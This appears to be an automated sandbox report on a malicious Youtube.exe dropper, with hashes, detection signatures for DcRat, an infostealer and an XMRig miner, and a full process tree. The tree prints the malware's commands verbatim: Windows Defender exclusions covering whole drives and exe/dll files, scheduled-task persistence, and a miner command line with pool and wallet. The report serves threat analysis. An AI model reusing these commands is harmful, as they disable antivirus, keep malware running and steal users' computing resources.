Overview

overview

10

Static

static

10

Youtube.exe

windows10-1703-x64

10

Youtube.exe

windows10-2004-x64

10

Youtube.exe

windows11-21h2-x64

10

Analysis

  • max time kernel
    85s
  • max time network
    95s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17-07-2024 13:00

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Youtube.exe

  • Size

    8.7MB

  • MD5

    d25ebdfc04bdadea74017fa72f90781f

  • SHA1

    f7278c4d04fc4db888368e0245d7607d8bcbb557

  • SHA256

    9f30de67eacb0138506eff3c67dc9c52b0e923416dc75722ac90b12210b5383f

  • SHA512

    77cca4e741a6f96cc35a3ce55c3f899f902719c8ee29c84a6f5dcb57e9d6b8f85cad2042486ff907046f3c87673f5a34da73730256822d090ae764ba21064e71

  • SSDEEP

    196608:fE7JB0tYrXLW+d7UcIxptvyUQymRDSI1WCOK5m:fE9B0OjrdLK4J/Y

Score
10/10
dcratxmrigexecutioninfostealerminerpersistenceratspywarestealer

Malware Config

Signatures

  • DcRat 33 IoCs

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

    ratinfostealerdcrat
  • Modifies WinLogon for persistence 2 TTPs 10 IoCs
    persistence
  • Process spawned unexpected child process 30 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • DCRat payload 6 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

    rat
  • XMRig Miner payload 10 IoCs
    miner
  • Command and Scripting Interpreter: PowerShell 1 TTPs 28 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Downloads MZ/PE file
  • .NET Reactor proctector 1 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks computer location settings 2 TTPs 11 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 14 IoCs
  • Loads dropped DLL 11 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 20 IoCs
    persistence
  • Blocklisted process makes network request 2 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 29 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies data under HKEY_USERS 3 IoCs
  • Modifies registry class 35 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 31 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\Youtube.exe
    "C:\Users\Admin\AppData\Local\Temp\Youtube.exe"
    1⤵
    • DcRat
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4244
    • C:\Users\Admin\AppData\Local\Temp\Result.exe
      "C:\Users\Admin\AppData\Local\Temp\Result.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:3788
      • C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1768
        • C:\Windows\SysWOW64\msiexec.exe
          "msiexec" /i "C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi" /qn
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2152
      • C:\Users\Admin\AppData\Local\Temp\solara.exe
        "C:\Users\Admin\AppData\Local\Temp\solara.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:2668
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\aImCrmZyeD77A2ANdrk.vbe"
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4028
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\4F0VCIGGZPxdNa.bat" "
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4872
            • C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe
              "C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"
              6⤵
              • DcRat
              • Modifies WinLogon for persistence
              • Checks computer location settings
              • Executes dropped EXE
              • Adds Run key to start application
              • Drops file in Windows directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4400
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3060
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Portable Devices\spoolsv.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4620
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\sihost.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1764
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\Registry.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4480
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\INF\LSM\0000\Registry.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3144
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2280
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\wscript.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3044
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\fontdrvhost.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1356
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\OneDrive\System.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1208
              • C:\DriversavessessionDlldhcp\wscript.exe
                "C:\DriversavessessionDlldhcp\wscript.exe"
                7⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:216
    • C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
      "C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:2852
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\winNet\we9fgyC144zVOkGk.vbe"
        3⤵
        • Checks computer location settings
        PID:4960
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\winNet\rsH0xIUsPk2E2Mq2a4QwbDGWD6K8lz.bat" "
          4⤵
            PID:2772
            • C:\winNet\ComContainerbrowserRefRuntime.exe
              "C:\winNet/ComContainerbrowserRefRuntime.exe"
              5⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Drops file in Program Files directory
              • Drops file in Windows directory
              • Modifies registry class
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2124
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\UkVSpOMmrh.bat"
                6⤵
                  PID:4376
                  • C:\Windows\system32\chcp.com
                    chcp 65001
                    7⤵
                      PID:4120
                    • C:\Windows\system32\PING.EXE
                      ping -n 10 localhost
                      7⤵
                      • Runs ping.exe
                      PID:1228
                    • C:\Program Files\Windows Media Player\es-ES\fontdrvhost.exe
                      "C:\Program Files\Windows Media Player\es-ES\fontdrvhost.exe"
                      7⤵
                      • Executes dropped EXE
                      PID:5824
          • C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe
            "C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"
            2⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2704
            • C:\Windows\System32\conhost.exe
              "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"
              3⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1548
              • C:\Windows\System32\cmd.exe
                "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                4⤵
                  PID:4956
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                    5⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3624
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                    5⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2188
                • C:\Windows\System32\cmd.exe
                  "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"
                  4⤵
                    PID:1456
                    • C:\Windows\system32\schtasks.exe
                      schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"
                      5⤵
                      • DcRat
                      • Scheduled Task/Job: Scheduled Task
                      PID:2648
                  • C:\Windows\System32\cmd.exe
                    "cmd" cmd /c "C:\Users\Admin\Bloxstrap.exe"
                    4⤵
                      PID:5828
                      • C:\Users\Admin\Bloxstrap.exe
                        C:\Users\Admin\Bloxstrap.exe
                        5⤵
                        • Executes dropped EXE
                        PID:5744
                        • C:\Windows\System32\conhost.exe
                          "C:\Windows\System32\conhost.exe" "C:\Users\Admin\Bloxstrap.exe"
                          6⤵
                          • Suspicious use of SetThreadContext
                          PID:5296
                          • C:\Windows\System32\cmd.exe
                            "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                            7⤵
                              PID:4820
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                                8⤵
                                • Command and Scripting Interpreter: PowerShell
                                PID:1720
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                                8⤵
                                • Command and Scripting Interpreter: PowerShell
                                PID:6052
                            • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                              "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                              7⤵
                              • Executes dropped EXE
                              PID:5400
                              • C:\Windows\System32\conhost.exe
                                "C:\Windows\System32\conhost.exe" "/sihost64"
                                8⤵
                                  PID:1592
                              • C:\Windows\explorer.exe
                                C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=43a4sKqYaYRDJ11nnS8kk6ATe7pwz7GqaGCjueKKVcqS8V7ZgQduYQSENk7PRNr1FjgxF7TADqsRBjA5cMsYJeovSPcRAnK --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=2 --cinit-idle-cpu=90 --tls --cinit-stealth
                                7⤵
                                  PID:4840
                      • C:\Users\Admin\AppData\Local\Temp\Frage build.exe
                        "C:\Users\Admin\AppData\Local\Temp\Frage build.exe"
                        2⤵
                        • Checks computer location settings
                        • Executes dropped EXE
                        • Modifies registry class
                        • Suspicious use of WriteProcessMemory
                        PID:4876
                        • C:\Windows\SysWOW64\WScript.exe
                          "C:\Windows\System32\WScript.exe" "C:\DriversavessessionDlldhcp\ghJPtatrYDLygnNWh9dEZv.vbe"
                          3⤵
                          • Checks computer location settings
                          PID:1588
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c ""C:\DriversavessessionDlldhcp\exFbRiwQoowToPhSTKSA9iYE.bat" "
                            4⤵
                              PID:3608
                              • C:\DriversavessessionDlldhcp\Roblox.exe
                                "C:\DriversavessessionDlldhcp/Roblox.exe"
                                5⤵
                                • Modifies WinLogon for persistence
                                • Checks computer location settings
                                • Executes dropped EXE
                                • Adds Run key to start application
                                • Modifies registry class
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1420
                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\btg24o0z\btg24o0z.cmdline"
                                  6⤵
                                    PID:2128
                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF4A1.tmp" "c:\Program Files (x86)\Windows Portable Devices\CSC312511A22D304A1392C8F9486D41E1B7.TMP"
                                      7⤵
                                        PID:320
                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\b5qk1ofe\b5qk1ofe.cmdline"
                                      6⤵
                                        PID:2164
                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF54D.tmp" "c:\Recovery\WindowsRE\CSC3FAD3555EA6426899799C902E69D5FA.TMP"
                                          7⤵
                                            PID:3468
                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ph44r1jy\ph44r1jy.cmdline"
                                          6⤵
                                          • Drops file in Windows directory
                                          PID:2392
                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF685.tmp" "c:\Windows\INF\LSM\0000\CSC7C9637A86E4B4EEAB94FCE20E8EC25D.TMP"
                                            7⤵
                                              PID:4184
                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\defndgal\defndgal.cmdline"
                                            6⤵
                                              PID:2904
                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF79E.tmp" "c:\Program Files\Windows Sidebar\Gadgets\CSC1882193821D84F3BA238B7D6DF274A97.TMP"
                                                7⤵
                                                  PID:2056
                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yyx0y5lv\yyx0y5lv.cmdline"
                                                6⤵
                                                  PID:844
                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF82B.tmp" "c:\DriversavessessionDlldhcp\CSC7DF9C3A8B2B847278B9BEDA1BA5EB455.TMP"
                                                    7⤵
                                                      PID:3308
                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ja5mlg4l\ja5mlg4l.cmdline"
                                                    6⤵
                                                      PID:4900
                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF8E7.tmp" "c:\Users\Default User\CSCE1D1D48C9A340D3A5646939C7DFD3AC.TMP"
                                                        7⤵
                                                          PID:3548
                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1iyh05oj\1iyh05oj.cmdline"
                                                        6⤵
                                                          PID:1764
                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF9A2.tmp" "c:\Users\Admin\OneDrive\CSC95C2EC90C73545EC8FF8D3CE522B96DB.TMP"
                                                            7⤵
                                                              PID:2288
                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\krs0suoi\krs0suoi.cmdline"
                                                            6⤵
                                                            • Drops file in System32 directory
                                                            PID:4336
                                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFA5E.tmp" "c:\Windows\System32\CSCE3595406306649F9801A1EA8DF2D26.TMP"
                                                              7⤵
                                                                PID:4188
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                                              6⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              PID:2100
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                                              6⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              PID:220
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                                              6⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              PID:3472
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/DriversavessessionDlldhcp/'
                                                              6⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              PID:2392
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                                              6⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              PID:1408
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                                              6⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              PID:1188
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                                              6⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              PID:1276
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                                              6⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              PID:2056
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                                              6⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              PID:4000
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                                              6⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              PID:2772
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                                              6⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              PID:752
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                                              6⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:3708
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/winNet/'
                                                              6⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              PID:3624
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\RuntimeBroker.exe'
                                                              6⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              PID:112
                                                              • C:\Windows\System32\Conhost.exe
                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                7⤵
                                                                  PID:1764
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\Roblox.exe'
                                                                6⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                PID:1204
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ouedm3meSR.bat"
                                                                6⤵
                                                                  PID:1108
                                                                  • C:\Windows\system32\chcp.com
                                                                    chcp 65001
                                                                    7⤵
                                                                      PID:5704
                                                                    • C:\Windows\system32\w32tm.exe
                                                                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                      7⤵
                                                                        PID:3944
                                                                      • C:\Users\Admin\AppData\Local\RuntimeBroker.exe
                                                                        "C:\Users\Admin\AppData\Local\RuntimeBroker.exe"
                                                                        7⤵
                                                                        • Executes dropped EXE
                                                                        PID:4980
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Portable Devices\spoolsv.exe'" /f
                                                            1⤵
                                                            • DcRat
                                                            • Process spawned unexpected child process
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:3624
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Portable Devices\spoolsv.exe'" /rl HIGHEST /f
                                                            1⤵
                                                            • DcRat
                                                            • Process spawned unexpected child process
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:3944
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Portable Devices\spoolsv.exe'" /rl HIGHEST /f
                                                            1⤵
                                                            • DcRat
                                                            • Process spawned unexpected child process
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:5080
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\sihost.exe'" /f
                                                            1⤵
                                                            • DcRat
                                                            • Process spawned unexpected child process
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:2228
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\sihost.exe'" /rl HIGHEST /f
                                                            1⤵
                                                            • DcRat
                                                            • Process spawned unexpected child process
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:616
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\sihost.exe'" /rl HIGHEST /f
                                                            1⤵
                                                            • DcRat
                                                            • Process spawned unexpected child process
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:2348
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 12 /tr "'C:\winNet\Registry.exe'" /f
                                                            1⤵
                                                            • DcRat
                                                            • Process spawned unexpected child process
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:3472
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\winNet\Registry.exe'" /rl HIGHEST /f
                                                            1⤵
                                                            • DcRat
                                                            • Process spawned unexpected child process
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:4936
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 6 /tr "'C:\winNet\Registry.exe'" /rl HIGHEST /f
                                                            1⤵
                                                            • DcRat
                                                            • Process spawned unexpected child process
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:1532
                                                          • C:\Windows\system32\msiexec.exe
                                                            C:\Windows\system32\msiexec.exe /V
                                                            1⤵
                                                            • Blocklisted process makes network request
                                                            • Enumerates connected drives
                                                            • Drops file in Program Files directory
                                                            • Drops file in Windows directory
                                                            • Modifies data under HKEY_USERS
                                                            • Modifies registry class
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
